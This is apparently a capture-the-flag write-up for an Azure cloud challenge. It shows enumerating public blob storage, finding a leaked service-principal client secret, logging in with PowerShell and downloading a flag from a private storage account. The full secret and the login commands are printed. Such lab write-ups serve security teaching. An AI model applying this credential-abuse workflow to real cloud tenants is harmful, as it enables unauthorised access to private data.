Cloudy with a chance of meatball
Medium
500
3
Description
Today in school, I learnt to code in HTML! View my brand new website! www.lncctf2023.tk Hint 1: Identify how the website is hosted using what services
Hint 2: Enumerate your role and the allowed actions
Viewing the website, we can identify that it is hosted on some azure services

Since there isnt much information, other than the domain name, we can use MicroBurst to perform unauthenticated enumeration.
Refering to HackTricks

From the MicroBurst output, I have identified 2 files, /private/instructions.txt
and /root/flag.txt
The /root/flag.txt
shows a troll flag but /private/instructions.txt
has some juicy information.
Note to self:
Credentials for accessing the tenant.
Hopefully no one can see this...
Tenant ID: c11b22d2-d015-47e0-bc0b-e6a0b1e25993
Application ID: ee767510-7041-4930-a672-1217ff9ff51a
Client Secret: pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ
Since I have a set of credentials, we are able to use Azure PowerShell module to login with the service principal
$appid="ee767510-7041-4930-a672-1217ff9ff51a"
$secret="pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ"
$tid= 'c11b22d2-d015-47e0-bc0b-e6a0b1e25993'
$creds = (ConvertTo-SecureString $secret -AsPlainText -Force)
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appid,$creds
Connect-AzAccount -ServicePrincipal -TenantId $tid -Credential $creds

Next, I can enumerate the resources our service principal has access to using Get-AzResource

I manage to identify that there is another storage account called lncctf2023private
. I am then able to retrieve the flag from the private storage account
$rg="lncctf2023_cloudy_meatball_rg"
$saname="lncctf2023private"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context
Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container flag
Get-AzStorageBlobContent -Blob flag.txt -Container flag -Destination flag.txt -Context $ctx

Flag: LNC2023{aZuR3_pUbL1C_c0ntAiN3R_i3_n0T_s0_s3cuR3}
Last updated
Was this helpful?